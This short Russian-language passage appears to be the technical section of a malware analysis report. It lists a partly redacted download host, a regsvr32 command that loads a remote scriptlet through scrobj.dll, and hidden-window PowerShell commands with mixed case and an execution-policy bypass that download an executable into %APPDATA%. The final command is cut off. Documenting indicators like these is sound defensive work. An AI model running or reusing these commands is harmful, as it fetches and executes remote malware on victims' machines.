Техническая информация
- http://fa##.com/gpp.exe
- '<SYSTEM32>\regsvr32.exe' -s -N /U -i:http://fa##.com/gpsct.sct scrOBj.dLL
- http://fa##.com/gpsct.sct
- http://fa##.com/gpp.exe
- DNS ASK fa##.com
- '<SYSTEM32>\regsvr32.exe' -s -N /U -i:http://fa##.com/gpsct.sct scrOBj.dLL' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/c POwERsHELL.eXE -EX BYpaSs -NoP -w 1 sEt-CoNTent -VA ( NeW-obJect Net.webCLIEnT ).DoWNLoaddatA( 'http://fa##.com/gpp.exe' ) -En byTe -patH '%APPDATA%\jhdfhj...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/c POwERsHELL.eXE -EX BYpaSs -NoP -w 1 sEt-CoNTent -VA ( NeW-obJect Net.webCLIEnT ).DoWNLoaddatA( 'http://fa##.com/gpp.exe' ) -En byTe -patH '%APPDATA%\jhdfhj...